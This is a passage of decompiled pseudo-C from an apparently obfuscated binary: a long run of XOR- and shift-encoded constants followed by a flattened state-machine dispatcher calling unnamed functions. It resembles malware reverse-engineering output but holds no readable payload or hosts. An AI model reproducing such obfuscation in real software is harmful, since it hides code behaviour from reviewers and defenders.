                          				_v464 = _v464 * 0x7a;
                          				_v464 = _v464 ^ 0x00d327e8;
                          				_v648 = 0xd540cd;
                          				_v648 = _v648 * 0x5c;
                          				_v648 = _v648 >> 0xb;
                          				_v648 = _v648 / _t1348;
                          				_v648 = _v648 ^ 0x0005d45a;
                          				_v540 = 0x2acc1;
                          				_v540 = _v540 >> 7;
                          				_v540 = _v540 << 0x10;
                          				_t1349 = 0x59;
                          				_v540 = _v540 / _t1349;
                          				_v540 = _v540 ^ 0x000fef6f;
                          				_v264 = 0xfe7d93;
                          				_v264 = _v264 ^ 0x4bd787a7;
                          				_v264 = _v264 ^ 0x4b22b45d;
                          				_v208 = 0x23d5c9;
                          				_v208 = _v208 ^ 0x8f5a829d;
                          				_v208 = _v208 ^ 0x8f7555ae;
                          				_v524 = 0x2aaed2;
                          				_v524 = _v524 | 0x9661325e;
                          				_t1495 = 0x5c;
                          				_v524 = _v524 / _t1495;
                          				_v524 = _v524 * 0x63;
                          				_v524 = _v524 ^ 0xa1d330ca;
                          				_v612 = 0x173148;
                          				_v612 = _v612 >> 5;
                          				_v612 = _v612 + 0x14e7;
                          				_v612 = _v612 / _t1349;
                          				_v612 = _v612 ^ 0x0000773b;
                          				_v620 = 0xe48585;
                          				_v620 = _v620 << 0x10;
                          				_v620 = _v620 * 0x32;
                          				_v620 = _v620 >> 7;
                          				_v620 = _v620 ^ 0x0028030c;
                          				_v500 = 0xfd3bdc;
                          				_v500 = _v500 << 0xa;
                          				_v500 = _v500 ^ 0xf4e13163;
                          				_v520 = 0xe4fc5f;
                          				_v520 = _v520 + 0xa13e;
                          				_v520 = _v520 + 0xffff7828;
                          				_v520 = _v520 ^ 0x4d340404;
                          				_v520 = _v520 ^ 0x4dd63175;
                          				_v360 = 0x9532ce;
                          				_v360 = _v360 ^ 0xdad74cca;
                          				_v360 = _v360 | 0x8468d9e2;
                          				_v360 = _v360 ^ 0xde69f572;
                          				_v604 = 0x3a7c91;
                          				_v604 = _v604 | 0x10f1a45d;
                          				_v604 = _v604 + 0xffff6d1e;
                          				_v604 = _v604 | 0x776d764a;
                          				_v604 = _v604 ^ 0x77f7c5e5;
                          				_v212 = 0x6e3f57;
                          				_t279 =  &_v212; // 0x6e3f57
                          				_v212 =  *_t279 * 3;
                          				_v212 = _v212 ^ 0x01468193;
                          				_v220 = 0x58f789;
                          				_v220 = _v220 << 5;
                          				_v220 = _v220 ^ 0x0b1ef21b;
                          				_v236 = 0x737654;
                          				_v236 = _v236 + 0xe2b4;
                          				_v236 = _v236 ^ 0x0073a4da;
                          				_v416 = 0xc8c3a8;
                          				_v416 = _v416 ^ 0x4478b906;
                          				_v416 = _v416 * 0xc;
                          				_v416 = _v416 ^ 0x384ff3ff;
                          				_v576 = 0x407f47;
                          				_v576 = _v576 + 0x1a0d;
                          				_v576 = _v576 * 0x63;
                          				_v576 = _v576 << 2;
                          				_v576 = _v576 ^ 0x63e80fef;
                          				_v228 = 0x9b4b6;
                          				_v228 = _v228 + 0xffffd2d4;
                          				_v228 = _v228 ^ 0x000d2243;
                          				_v552 = 0xb96e33;
                          				_v552 = _v552 + 0x4381;
                          				_v552 = _v552 * 0xf;
                          				_v552 = _v552 + 0xffffbee9;
                          				_v552 = _v552 ^ 0x0ae545e5;
                          				_v560 = 0xe19e88;
                          				_v560 = _v560 | 0xc222c343;
                          				_v560 = _v560 / _t1465;
                          				_v560 = _v560 + 0x567c;
                          				_v560 = _v560 ^ 0x01c941bb;
                          				_v568 = 0xf463df;
                          				_v568 = _v568 | 0x401122c6;
                          				_v568 = _v568 >> 3;
                          				_v568 = _v568 | 0xf3373c61;
                          				_v568 = _v568 ^ 0xfb38c632;
                          				_v392 = 0xa88994;
                          				_v392 = _v392 >> 2;
                          				_v392 = _v392 + 0xfffffc92;
                          				_v392 = _v392 ^ 0x002883f3;
                          				_v544 = 0x16009;
                          				_v544 = _v544 ^ 0x700f0ae7;
                          				_v544 = _v544 << 0xd;
                          				_v544 = _v544 + 0xffffa581;
                          				_v544 = _v544 ^ 0xcd57c12d;
                          				_v400 = 0x4e3251;
                          				_v400 = _v400 << 0xd;
                          				_v400 = _v400 << 0xb;
                          				_v400 = _v400 ^ 0x510ef6f0;
                          				_v408 = 0xce49b4;
                          				_v408 = _v408 / _t1340;
                          				_v408 = _v408 | 0xa9ee0ad6;
                          				_v408 = _v408 ^ 0xa9ed29cd;
                          				_v368 = 0xfab4ff;
                          				_v368 = _v368 ^ 0x8bb4f731;
                          				_v368 = _v368 + 0x4788;
                          				_v368 = _v368 ^ 0x8b4dbddc;
                          				_v376 = 0x3b857d;
                          				_v376 = _v376 + 0xd8be;
                          				_v376 = _v376 ^ 0x0c7e0de1;
                          				_v376 = _v376 ^ 0x0c4b703c;
                          				_v384 = 0x702b67;
                          				_v384 = _v384 + 0x7016;
                          				_v384 = _v384 | 0xc6195e9d;
                          				_v384 = _v384 ^ 0xc67058d5;
                          				_v536 = 0xd092b2;
                          				_v536 = _v536 + 0xffff63c4;
                          				_v536 = _v536 | 0x81cb3080;
                          				_v536 = _v536 ^ 0x4ecdb7ae;
                          				_v536 = _v536 ^ 0xcf0bdc69;
                          				_v248 = 0xf8c39f;
                          				_v248 = _v248 | 0x0e89bf31;
                          				_v248 = _v248 ^ 0x0ef3b328;
                          				_v556 = 0x54f798;
                          				_v556 = _v556 >> 2;
                          				_v556 = _v556 ^ 0xd52f7ed0;
                          				_v556 = _v556 >> 6;
                          				_v556 = _v556 ^ 0x03531d7d;
                          				_v672 = 0xe1b7ad;
                          				_t1350 = 0x7a;
                          				_v672 = _v672 / _t1350;
                          				_v672 = _v672 << 0xc;
                          				_t1351 = 0xa;
                          				_v672 = _v672 / _t1351;
                          				_v672 = _v672 ^ 0x02f2c9f1;
                          				_v676 = 0xf0d76a;
                          				_v676 = _v676 >> 3;
                          				_v676 = _v676 + 0xffffb109;
                          				_v676 = _v676 >> 4;
                          				_v676 = _v676 ^ 0x0006f826;
                          				_v200 = 0xd1b71d;
                          				_t1352 = 0x7c;
                          				_v200 = _v200 / _t1352;
                          				_v200 = _v200 ^ 0x0006a6d0;
                          				_v596 = 0x496d6a;
                          				_t459 =  &_v596; // 0x496d6a
                          				_v596 =  *_t459 * 0x6b;
                          				_v596 = _v596 + 0xbb66;
                          				_v596 = _v596 + 0xffff602d;
                          				_v596 = _v596 ^ 0x1ebb8efb;
                          				_v404 = 0xf3863;
                          				_v404 = _v404 >> 0xe;
                          				_t1353 = 0x2a;
                          				_v404 = _v404 / _t1353;
                          				_v404 = _v404 ^ 0x00094758;
                          				_v476 = 0x611fd8;
                          				_v476 = _v476 | 0xb878f5dc;
                          				_v476 = _v476 + 0xad5b;
                          				_v476 = _v476 ^ 0xb87809fa;
                          				_v460 = 0xcf43a7;
                          				_v460 = _v460 ^ 0xdec9221b;
                          				_v460 = _v460 ^ 0xf00bdbd0;
                          				_v460 = _v460 ^ 0x2e089b39;
                          				_v340 = 0x6e2519;
                          				_v340 = _v340 + 0xffff23bc;
                          				_v340 = _v340 + 0xffffab38;
                          				_v340 = _v340 ^ 0x00658e81;
                          				_v468 = 0x6e95b3;
                          				_v468 = _v468 | 0xe42d871f;
                          				_v468 = _v468 + 0xffff0334;
                          				_v468 = _v468 ^ 0xe4661c95;
                          				_v184 = 0x976a3e;
                          				_v184 = _v184 >> 2;
                          				_v184 = _v184 ^ 0x002fb3e7;
                          				_v640 = 0xf929b2;
                          				_v640 = _v640 >> 4;
                          				_v640 = _v640 + 0x46ec;
                          				_t1354 = 0x4e;
                          				_v640 = _v640 * 0x14;
                          				_v640 = _v640 ^ 0x013b9ce5;
                          				_v288 = 0x293a87;
                          				_v288 = _v288 * 0x1a;
                          				_v288 = _v288 ^ 0x042f344b;
                          				_v300 = 0x77766c;
                          				_v300 = _v300 + 0xffff170c;
                          				_v300 = _v300 ^ 0x007d4cee;
                          				_v308 = 0x8e9aa4;
                          				_v308 = _v308 / _t1354;
                          				_v308 = _v308 ^ 0x00052c4e;
                          				_v456 = 0x218ab6;
                          				_v456 = _v456 / _t1340;
                          				_v456 = _v456 << 8;
                          				_v456 = _v456 ^ 0x0138796e;
                          				_v632 = 0x66de5e;
                          				_v632 = _v632 + 0xffff10e7;
                          				_v632 = _v632 << 8;
                          				_v632 = _v632 + 0xffffeb43;
                          				_v632 = _v632 ^ 0x65e84e4c;
                          				_v412 = 0x242a03;
                          				_v412 = _v412 << 3;
                          				_v412 = _v412 >> 4;
                          				_v412 = _v412 ^ 0x00169ab3;
                          				_v580 = 0x395796;
                          				_v580 = _v580 << 7;
                          				_v580 = _v580 >> 9;
                          				_v580 = _v580 + 0xb065;
                          				_v580 = _v580 ^ 0x000e083d;
                          				_v192 = 0xd019c8;
                          				_t1355 = 0x29;
                          				_v192 = _v192 / _t1355;
                          				_v192 = _v192 ^ 0x000d0418;
                          				_v364 = 0x5114b6;
                          				_v364 = _v364 << 9;
                          				_v364 = _v364 << 0xf;
                          				_v364 = _v364 ^ 0xb6040cfd;
                          				_v452 = 0xdc8bb5;
                          				_v452 = _v452 ^ 0xb07e6e5f;
                          				_v452 = _v452 << 0xe;
                          				_v452 = _v452 ^ 0xb9795724;
                          				_v572 = 0xdefa33;
                          				_v572 = _v572 + 0xae39;
                          				_t1356 = 0x16;
                          				_v572 = _v572 * 0x56;
                          				_v572 = _v572 * 0x33;
                          				_v572 = _v572 ^ 0xf7eaa6cf;
                          				_v280 = 0x106c99;
                          				_v280 = _v280 ^ 0xf1e2e143;
                          				_v280 = _v280 ^ 0xf1f1647c;
                          				_v444 = 0x12ba83;
                          				_v444 = _v444 + 0xffff2e0b;
                          				_v444 = _v444 | 0x954218b9;
                          				_v444 = _v444 ^ 0x95501631;
                          				_v636 = 0x6f6552;
                          				_v636 = _v636 * 0x3a;
                          				_v636 = _v636 * 0x63;
                          				_v636 = _v636 ^ 0xc29eccb8;
                          				_v508 = 0x9979f;
                          				_v508 = _v508 >> 3;
                          				_v508 = _v508 + 0xffff8ecf;
                          				_v508 = _v508 ^ 0x0008ebd3;
                          				_v504 = 0x338317;
                          				_v504 = _v504 + 0xffff3917;
                          				_v504 = _v504 >> 1;
                          				_v504 = _v504 ^ 0x001e4512;
                          				_v420 = 0x2775fd;
                          				_v420 = _v420 / _t1356;
                          				_v420 = _v420 | 0x1f6013d3;
                          				_v420 = _v420 ^ 0x1f654eff;
                          				_v656 = 0x7dcf58;
                          				_v656 = _v656 ^ 0x77b5ed19;
                          				_v656 = _v656 + 0x312f;
                          				_v656 = _v656 << 0xe;
                          				_v656 = _v656 ^ 0x14d47f34;
                          				_v488 = 0x685995;
                          				_v488 = _v488 >> 9;
                          				_v488 = _v488 + 0xe674;
                          				_v488 = _v488 ^ 0x000367d5;
                          				_v328 = 0x4f2a8a;
                          				_t1357 = 0x30;
                          				_v328 = _v328 * 0x6c;
                          				_v328 = _v328 ^ 0x2165dbb2;
                          				_v664 = 0xf8ddee;
                          				_v664 = _v664 + 0xffffc10e;
                          				_v664 = _v664 + 0x5798;
                          				_v664 = _v664 | 0xdb7e095f;
                          				_v664 = _v664 ^ 0xdbfa1ad3;
                          				_v616 = 0xdf2722;
                          				_v616 = _v616 << 0x10;
                          				_v616 = _v616 << 0xf;
                          				_v616 = _v616 << 5;
                          				_v616 = _v616 ^ 0x0003a7ab;
                          				_v284 = 0x367b22;
                          				_t693 =  &_v284; // 0x367b22
                          				_v284 =  *_t693 / _t1357;
                          				_v284 = _v284 ^ 0x00041d99;
                          				_v292 = 0xfb329f;
                          				_v292 = _v292 + 0xffffce68;
                          				_v292 = _v292 ^ 0x00fc3f30;
                          				_v624 = 0xe6983f;
                          				_v624 = _v624 * 0x70;
                          				_v624 = _v624 ^ 0x3704df59;
                          				_v624 = _v624 * 9;
                          				_v624 = _v624 ^ 0xf3155be5;
                          				_v260 = 0xc363a2;
                          				_v260 = _v260 ^ 0x1025f5e4;
                          				_v260 = _v260 ^ 0x10ec772f;
                          				_v268 = 0x606a55;
                          				_v268 = _v268 >> 3;
                          				_v268 = _v268 ^ 0x000fc817;
                          				_v600 = 0xd902a;
                          				_v600 = _v600 >> 0xb;
                          				_v600 = _v600 << 1;
                          				_v600 = _v600 << 6;
                          				_v600 = _v600 ^ 0x00039c6b;
                          				_v276 = 0xc6f76b;
                          				_v276 = _v276 + 0xc129;
                          				_v276 = _v276 ^ 0x00cee0d7;
                          				_v440 = 0x65c4cc;
                          				_v440 = _v440 ^ 0xf07a0639;
                          				_t1358 = 0x69;
                          				_v440 = _v440 * 0x5f;
                          				_v440 = _v440 ^ 0x1bc0a904;
                          				_v584 = 0x39d860;
                          				_v584 = _v584 * 0x58;
                          				_v584 = _v584 + 0x4905;
                          				_v584 = _v584 * 0x2a;
                          				_v584 = _v584 ^ 0x432fbf1f;
                          				_v448 = 0xf8616a;
                          				_v448 = _v448 >> 4;
                          				_v448 = _v448 + 0xfd7e;
                          				_v448 = _v448 ^ 0x0010392b;
                          				_v244 = 0x3f99e5;
                          				_v244 = _v244 | 0x57277205;
                          				_v244 = _v244 ^ 0x57370e4e;
                          				_v348 = 0xf9a67d;
                          				_v348 = _v348 + 0xffff1738;
                          				_v348 = _v348 + 0xa0df;
                          				_v348 = _v348 ^ 0x00f7be80;
                          				_v564 = 0x164474;
                          				_v564 = _v564 + 0xffff8d5e;
                          				_v564 = _v564 | 0xc2a179fa;
                          				_v564 = _v564 / _t1358;
                          				_v564 = _v564 ^ 0x01d1c3a4;
                          				_v668 = 0xe03ad;
                          				_v668 = _v668 + 0xffffcc8a;
                          				_t1359 = 0x3c;
                          				_v668 = _v668 / _t1359;
                          				_v668 = _v668 | 0xd2e9204d;
                          				_v668 = _v668 ^ 0xd2e45507;
                          				_v532 = 0xe9adcf;
                          				_v532 = _v532 + 0xffffcf22;
                          				_v532 = _v532 + 0xfffffe50;
                          				_t1360 = 0x7b;
                          				_v532 = _v532 / _t1360;
                          				_v532 = _v532 ^ 0x000617c2;
                          				_v204 = 0x5a4d2e;
                          				_v204 = _v204 + 0xffff4d75;
                          				_v204 = _v204 ^ 0x00531e36;
                          				_v224 = 0xf2d317;
                          				_v224 = _v224 * 3;
                          				_v224 = _v224 ^ 0x02d347bf;
                          				_v644 = 0xc36dbf;
                          				_v644 = _v644 + 0xffff71a3;
                          				_v644 = _v644 | 0x544094bf;
                          				_v644 = _v644 + 0x4309;
                          				_v644 = _v644 ^ 0x54c28134;
                          				_v296 = 0xcf1d90;
                          				_v296 = _v296 | 0x31ca05e0;
                          				_v296 = _v296 ^ 0x31c90339;
                          				_v588 = 0xc34a2d;
                          				_v588 = _v588 >> 8;
                          				_v588 = _v588 >> 4;
                          				_v588 = _v588 + 0x75c1;
                          				_v588 = _v588 ^ 0x000d315f;
                          				_v240 = 0xeb7d33;
                          				_v240 = _v240 + 0xffffc753;
                          				_v240 = _v240 ^ 0x00e8d488;
                          				_v180 = 0x669bed;
                          				_v180 = _v180 / _t1495;
                          				_v180 = _v180 ^ 0x0002c9fb;
                          				_v496 = 0xfe0b00;
                          				_v496 = _v496 ^ 0x5fe703de;
                          				_v496 = _v496 << 6;
                          				_v496 = _v496 ^ 0xc645a863;
                          				_v660 = 0x916252;
                          				_v660 = _v660 >> 3;
                          				_v660 = _v660 << 0xd;
                          				_v660 = _v660 + 0xffff7dae;
                          				_v660 = _v660 ^ 0x458d7e10;
                          				_v320 = 0x2cf738;
                          				_v320 = _v320 | 0xc975dcc7;
                          				_v320 = _v320 ^ 0xc9795cda;
                          				_v312 = 0xb1d1ee;
                          				_v312 = _v312 + 0xffff51df;
                          				_v312 = _v312 ^ 0x00b16bbb;
                          				_v344 = 0x3e092b;
                          				_v344 = _v344 >> 2;
                          				_v344 = _v344 << 0xe;
                          				_v344 = _v344 ^ 0xe09a27cb;
                          				_v352 = 0x68a1a;
                          				_v352 = _v352 + 0xc791;
                          				_v352 = _v352 | 0x7642bfae;
                          				_v352 = _v352 ^ 0x76458494;
                          				_v512 = 0xe86ea0;
                          				_v512 = _v512 + 0xf959;
                          				_v512 = _v512 | 0x4e18ffd8;
                          				_t1361 = 0x17;
                          				_v512 = _v512 / _t1361;
                          				_v512 = _v512 ^ 0x036c12f7;
                          				_v396 = 0xe760c6;
                          				_t1362 = 0x26;
                          				_v396 = _v396 * 0x31;
                          				_v396 = _v396 * 0x56;
                          				_v396 = _v396 ^ 0xe1869eee;
                          				_v316 = 0x7a30c6;
                          				_v316 = _v316 / _t1362;
                          				_v316 = _v316 ^ 0x0003103d;
                          				_v628 = 0x4f3273;
                          				_t1363 = 0x78;
                          				_v628 = _v628 / _t1363;
                          				_v628 = _v628 << 0xa;
                          				_v628 = _v628 ^ 0x53aad572;
                          				_v628 = _v628 ^ 0x51090573;
                          				_v380 = 0x21784b;
                          				_v380 = _v380 << 7;
                          				_v380 = _v380 << 9;
                          				_v380 = _v380 ^ 0x784b0fa0;
                          				_v428 = 0xd8c839;
                          				_v428 = _v428 + 0x77d0;
                          				_v428 = _v428 >> 2;
                          				_v428 = _v428 ^ 0x00364f42;
                          				_v324 = 0x188352;
                          				_v324 = _v324 + 0xffffa07e;
                          				_v324 = _v324 ^ 0x00159870;
                          				_v252 = 0xe98be6;
                          				_v252 = _v252 >> 2;
                          				_v252 = _v252 ^ 0x0037d959;
                          				_v480 = 0xa4f1f5;
                          				_t1364 = 0x59;
                          				_t1466 = _v500;
                          				_v480 = _v480 / _t1364;
                          				_v480 = _v480 + 0xffff7faf;
                          				_v480 = _v480 ^ 0x000fae01;
                          				_v592 = 0x82c23d;
                          				_v592 = _v592 + 0x5741;
                          				_v592 = _v592 ^ 0x9a18022a;
                          				_v592 = _v592 << 0x10;
                          				_v592 = _v592 ^ 0x1b5af420;
                          				_v424 = 0x341aa7;
                          				_v424 = _v424 | 0xfb8ffeba;
                          				_v424 = _v424 ^ 0xfbbf8b8f;
                          				_v432 = 0xf44743;
                          				_t1365 = 0x76;
                          				_t1341 = _v500;
                          				_v432 = _v432 / _t1365;
                          				_v432 = _v432 / _t1365;
                          				_v432 = _v432 ^ 0x0000ee1d;
                          				goto L1;
                          				do {
                          					while(1) {
                          						L1:
                          						_t1504 = _t1469 - 0x856f9ca;
                          						if(_t1504 <= 0) {
                          						}
                          						L2:
                          						if(_t1504 == 0) {
                          							_t1259 = E00D427F9();
                          							L113:
                          							return _t1259;
                          						}
                          						_t1505 = _t1469 - 0x39ddd07;
                          						if(_t1505 > 0) {
                          							__eflags = _t1469 - 0x5c221fd;
                          							if(__eflags > 0) {
                          								__eflags = _t1469 - 0x627e178;
                          								if(_t1469 == 0x627e178) {
                          									_t1259 = E00D52009();
                          									_t1469 = 0xa51fadb;
                          									while(1) {
                          										L1:
                          										_t1504 = _t1469 - 0x856f9ca;
                          										if(_t1504 <= 0) {
                          										}
                          										goto L54;
                          									}
                          									goto L2;
                          								}
                          								__eflags = _t1469 - 0x6362904;
                          								if(_t1469 == 0x6362904) {
                          									_t1259 = E00D34B5D();
                          									_t1469 = 0x223c7a9;
                          									continue;
                          								}
                          								__eflags = _t1469 - 0x7a1cd5a;
                          								if(_t1469 == 0x7a1cd5a) {
                          									E00D4E955();
                          									_t1259 = E00D4D111();
                          									asm("sbb esi, esi");
                          									_t1469 = ( ~_t1259 & 0x02cd2b2b) + 0x6362904;
                          									continue;
                          								}
                          								__eflags = _t1469 - 0x8488c7d;
                          								if(_t1469 != 0x8488c7d) {
                          									break;
                          								}
                          								_t1259 = E00D3DE74();
                          								asm("sbb esi, esi");
                          								_t1469 = ( ~_t1259 & 0x060e21f6) + 0x19bf82;
                          								continue;
                          							}
                          							if(__eflags == 0) {
                          								_t1259 = E00D43EAA();
                          								asm("sbb esi, esi");
                          								_t1482 =  ~_t1259 & 0xf8bf9ea4;
                          								L21:
                          								_t1469 = _t1482 + 0x9642905;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0x41f7676;
                          							if(__eflags == 0) {
                          								_t1259 = E00D3BDF9(__eflags);
                          								__eflags = _t1259;
                          								if(_t1259 == 0) {
                          									goto L113;
                          								}
                          								_t1469 = 0x22d34a3;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0x4c22f24;
                          							if(_t1469 == 0x4c22f24) {
                          								_t1259 = E00D4D1BC( &_v152, _v628, _v572, _v280, _v444,  &_v160, _v636, E00D3A40E());
                          								_t1500 = _t1500 + 0x18;
                          								asm("sbb esi, esi");
                          								_t1469 = ( ~_t1259 & 0x068737c2) + 0x4c22f24;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0x4d97dbc;
                          							if(_t1469 == 0x4d97dbc) {
                          								_t1259 = _v396;
                          								_t1469 = 0xcbac970;
                          								_v84 = _t1259;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0x4f2172b;
                          							if(_t1469 != 0x4f2172b) {
                          								break;
                          							}
                          							_v24 = E00D4C37E();
                          							_t1259 = E00D4BD13(_t1279, _v460, _v340, _v468, _v184);
                          							_t1500 = _t1500 + 0xc;
                          							_v20 = _t1259;
                          							_t1469 = 0xba8c9c0;
                          							continue;
                          						}
                          						if(_t1505 == 0) {
                          							_t1259 = E00D50E63();
                          							__eflags = _t1259;
                          							if(_t1259 == 0) {
                          								goto L113;
                          							}
                          							_t1469 = 0xb3966a4;
                          							continue;
                          						}
                          						_t1506 = _t1469 - 0x1db8a88;
                          						if(_t1506 > 0) {
                          							__eflags = _t1469 - 0x223c7a9;
                          							if(_t1469 == 0x223c7a9) {
                          								_t1259 = E00D517BD(_v500, _v520, _v360);
                          								goto L113;
                          							}
                          							__eflags = _t1469 - 0x22d34a3;
                          							if(_t1469 == 0x22d34a3) {
                          								_t1259 = E00D52699();
                          								_t1469 = 0xa8d90c;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0x282f66e;
                          							if(_t1469 == 0x282f66e) {
                          								_t1259 = E00D330E7();
                          								_v88 = _t1259;
                          								_t1469 = 0xc53db32;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0x32638c6;
                          							if(_t1469 != 0x32638c6) {
                          								break;
                          							}
                          							_t1259 = E00D52B09(_v224, _v152, _v644, _v296);
                          							L29:
                          							_t1469 = 0x18cfb4a;
                          							continue;
                          						}
                          						if(_t1506 == 0) {
                          							_t1259 = E00D377A3( &_v152, _v412, _v580, _v192,  &_v100);
                          							_t1500 = _t1500 + 0xc;
                          							asm("sbb esi, esi");
                          							_t1469 = ( ~_t1259 & 0x019bf65e) + 0x32638c6;
                          							continue;
                          						}
                          						if(_t1469 == 0x19bf82) {
                          							_t1287 = E00D3670B();
                          							__eflags = _t1287;
                          							if(_t1287 == 0) {
                          								_t1259 = E00D4D111();
                          								asm("sbb esi, esi");
                          								_t1469 = ( ~_t1259 & 0x05b25150) + 0x8c2c3ca;
                          								continue;
                          							}
                          							_t1259 = E00D4D111();
                          							asm("sbb esi, esi");
                          							_t1482 =  ~_t1259 & 0xfc5df8f8;
                          							__eflags = _t1482;
                          							goto L21;
                          						}
                          						if(_t1469 == 0xa8d90c) {
                          							_t1259 = E00D42142();
                          							__eflags = _t1259;
                          							if(_t1259 == 0) {
                          								goto L113;
                          							}
                          							_t1469 = 0x39ddd07;
                          							continue;
                          						}
                          						if(_t1469 == 0x18cfb4a) {
                          							__eflags = _t1466 - _v332;
                          							if(_t1466 == _v332) {
                          								L16:
                          								_t1469 = _t1341;
                          								break;
                          							}
                          							_t1259 = E00D51028(_v180, _v496, E00D3A40E(), _t1466, _v660, _v320);
                          							_t1500 = _t1500 + 0x10;
                          							__eflags = _t1259 - _v548;
                          							if(_t1259 == _v548) {
                          								_t1259 = E00D44F74();
                          								goto L16;
                          							} else {
                          								_t1469 = 0x892c27a;
                          								continue;
                          							}
                          						}
                          						if(_t1469 != 0x19b3c55) {
                          							break;
                          						} else {
                          							_t1259 = E00D52B09(_v668, _v160, _v532, _v204);
                          							_t1469 = 0x32638c6;
                          							continue;
                          						}
                          						L54:
                          						__eflags = _t1469 - 0xba8c9c0;
                          						if(__eflags > 0) {
                          							__eflags = _t1469 - 0xe6d4a04;
                          							if(__eflags > 0) {
                          								__eflags = _t1469 - 0xe75151a;
                          								if(_t1469 == 0xe75151a) {
                          									E00D3A445();
                          									_t1469 = 0x8c2c3ca;
                          									break;
                          								}
                          								__eflags = _t1469 - 0xea72fdd;
                          								if(_t1469 == 0xea72fdd) {
                          									_t1259 = E00D48D3D();
                          									_t1469 = 0xee19950;
                          									continue;
                          								}
                          								__eflags = _t1469 - 0xee19950;
                          								if(__eflags == 0) {
                          									_v168 = E00D43D85(_v236, 0xd31248, __eflags,  &_v164, _v416);
                          									_v176 = E00D43D85(_v576, 0xd312a8, __eflags,  &_v172, _v228);
                          									_t1299 = E00D49A01( &_v176,  &_v168, _v552, _v560, _v568);
                          									asm("sbb esi, esi");
                          									_t1469 = ( ~_t1299 & 0x03fcb1a4) + 0x75265a3;
                          									E00D4FECB(_v176, _v392, _v544, _v400, _v408);
                          									_t1259 = E00D4FECB(_v168, _v368, _v376, _v384, _v536);
                          									_t1500 = _t1500 + 0x34;
                          								}
                          								break;
                          							}
                          							if(__eflags == 0) {
                          								_t1469 = 0x41f7676;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0xc031f76;
                          							if(_t1469 == 0xc031f76) {
                          								_t1384 = _v616;
                          								_t1259 = E00D4E4E5(_v284,  &_v108, _v292, _v624);
                          								_t1500 = _t1500 + 0xc;
                          								__eflags = _t1259;
                          								if(_t1259 == 0) {
                          									_t1259 = _v144;
                          									__eflags = _t1259;
                          									if(_t1259 == 0) {
                          										_push(_t1384);
                          										_push(_t1384);
                          										_t1466 = E00D4CCA0(_v252, _v592);
                          										_t1500 = _t1500 + 0x10;
                          										_t1259 = _v144;
                          									}
                          									__eflags = _t1259 - 1;
                          									if(_t1259 == 1) {
                          										_push(_t1384);
                          										_push(_t1384);
                          										_t1259 = E00D4CCA0(_v424, _v432);
                          										_t1500 = _t1500 + 0x10;
                          										_t1466 = _t1259;
                          									}
                          								} else {
                          									_t1466 = _v608;
                          								}
                          								_t1341 = 0xc4fb15d;
                          								_t1469 = 0x92191f9;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0xc4fb15d;
                          							if(_t1469 == 0xc4fb15d) {
                          								_t1259 = E00D35386(_v456,  &_v56, _v632);
                          								_pop(_t1384);
                          								_t1469 = 0x1db8a88;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0xc53db32;
                          							if(_t1469 == 0xc53db32) {
                          								_t1259 = E00D4C387(_t1384);
                          								_v92 = _t1259;
                          								_t1469 = 0x4d97dbc;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0xcbac970;
                          							if(_t1469 != 0xcbac970) {
                          								break;
                          							}
                          							_t1259 = _v316;
                          							_t1469 = 0xc4fb15d;
                          							_v44 = _t1259;
                          							continue;
                          						}
                          						if(__eflags == 0) {
                          							_t1259 = E00D3F8A0();
                          							_v12 = _t1259;
                          							_t1469 = 0x282f66e;
                          							continue;
                          						}
                          						__eflags = _t1469 - 0x9642905;
                          						if(__eflags > 0) {
                          							__eflags = _t1469 - 0xa51fadb;
                          							if(_t1469 == 0xa51fadb) {
                          								_t1259 = E00D4AD08();
                          								__eflags = _t1259;
                          								if(_t1259 == 0) {
                          									goto L113;
                          								}
                          								_t1469 = 0x7a1cd5a;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0xb3966a4;
                          							if(_t1469 == 0xb3966a4) {
                          								_t1259 = E00D44A66();
                          								__eflags = _t1259;
                          								if(_t1259 == 0) {
                          									goto L113;
                          								}
                          								_t1469 = 0x8488c7d;
                          								continue;
                          							}
                          							__eflags = _t1469 - 0xb4966e6;
                          							if(_t1469 == 0xb4966e6) {
                          								_t1384 = _v508;
                          								_t1310 = E00D355FF(_t1384, _v504, _v420,  &_v160,  &_v144);
                          								_t1500 = _t1500 + 0xc;
                          								__eflags = _t1310;
                          								if(_t1310 != 0) {
                          									_t1259 = _v144;
                          									__eflags = _t1259 - 8;
                          									if(_t1259 != 8) {
                          										__eflags = _t1259;
                          										if(_t1259 == 0) {
                          											L79:
                          											_t1469 = 0xc031f76;
                          											continue;
                          										}
                          										__eflags = _t1259 - 1;
                          										if(_t1259 != 1) {
                          											L64:
                          											_t1469 = 0x19b3c55;
                          											continue;
                          										}
                          										goto L79;
                          									}
                          									_t1469 = 0x856f9ca;
                          									continue;
                          								}
                          								_push(_t1384);
                          								_push(_t1384);
                          								_t1259 = E00D4CCA0(_v324, _v480);
                          								_t1500 = _t1500 + 0x10;
                          								_t1466 = _t1259;
                          								_t1341 = 0xc4fb15d;
                          								goto L64;
                          							}
                          							__eflags = _t1469 - 0xb4f1747;
                          							if(_t1469 != 0xb4f1747) {
                          								break;
                          							}
                          							E00D50E63();
                          							_t1341 = 0x4f2172b;
                          							_push(_t1384);
                          							_push(_t1384);
                          							_t1259 = E00D4CCA0(_v380, _v428);
                          							_t1500 = _t1500 + 0x10;
                          							_t1466 = _t1259;
                          							goto L29;
                          						}
                          						if(__eflags == 0) {
                          							_t1259 = E00D4FBDE();
                          							_t1469 = 0xea72fdd;
                          							continue;
                          						}
                          						__eflags = _t1469 - 0x892c27a;
                          						if(_t1469 == 0x892c27a) {
                          							_t1259 = E00D3A417(_t1384);
                          							goto L113;
                          						}
                          						__eflags = _t1469 - 0x8c2c3ca;
                          						if(_t1469 == 0x8c2c3ca) {
                          							_t1259 = E00D4C5D5();
                          							_t1469 = 0x627e178;
                          							continue;
                          						}
                          						__eflags = _t1469 - 0x903542f;
                          						if(_t1469 == 0x903542f) {
                          							_t1259 = E00D3D14C();
                          							_t1469 = 0x6362904;
                          							continue;
                          						}
                          						__eflags = _t1469 - 0x92191f9;
                          						if(_t1469 != 0x92191f9) {
                          							break;
                          						}
                          						_t1259 = E00D4D111();
